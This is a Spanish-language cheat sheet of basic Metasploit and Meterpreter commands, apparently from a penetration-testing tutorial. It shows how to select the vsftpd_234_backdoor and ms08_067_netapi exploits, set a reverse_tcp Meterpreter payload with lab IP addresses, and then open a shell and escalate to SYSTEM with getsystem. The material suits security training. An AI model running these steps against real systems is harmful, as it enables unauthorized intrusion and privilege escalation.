Metasploit - Comandos básicos

Tabla de comandos básicos de Metasploit

Comando

Uso

Ejemplo

use [auxiliary/exploit/payload/encoder/evasion]

Seleccionar un módulo específico

msf> use exploit/unix/ftp/vsftpd_234_backdoor

show [exploits/payloads/options/etc.]

Ver lista de módulos disponibles

msf> show payloads msf> show options

set [opción/payload]

Asignar valor a un parámetro específico

msf> set payload windows/meterpreter/reverse_tcp msf> set LHOST 192.168.10.118 msf> set RHOST 192.168.10.112

setg [opción/payload]

Asignar valor global a un parámetro

msf> setg RHOST 192.168.10.112

run

Ejecutar un módulo auxiliar

msf> run

exploit

Ejecutar un exploit

msf> exploit

back

Salir del módulo actual y volver

msf(ms08_067_netapi)> back

info

Ver información detallada de un módulo

msf> info exploit/windows/smb/ms08_067_netapi

search

Buscar un módulo específico

msf> search hfs

check

Verificar si el objetivo es vulnerable

msf> check

sessions

Listar sesiones activas

msf> sessions [número]

Comandos básicos de Meterpreter(se verá más adelante)

Comando

Uso

Ejemplo

sysinfo

Obtener información del sistema comprometido

meterpreter> sysinfo

ifconfig / ipconfig

Listar interfaces de red

meterpreter> ifconfig

arp

Ver IPs y MACs conectadas al objetivo

meterpreter> arp

background

Enviar sesión activa a segundo plano

meterpreter> background

shell

Abrir shell de comandos

meterpreter> shell

getuid

Obtener nombre de usuario actual

meterpreter> getuid

getsystem

Escalar privilegios a SYSTEM

meterpreter> getsystem

getpid

Obtener el PID del proceso de Meterpreter

meterpreter> getpid

ps

Listar todos los procesos activos

meterpreter> ps

Última actualización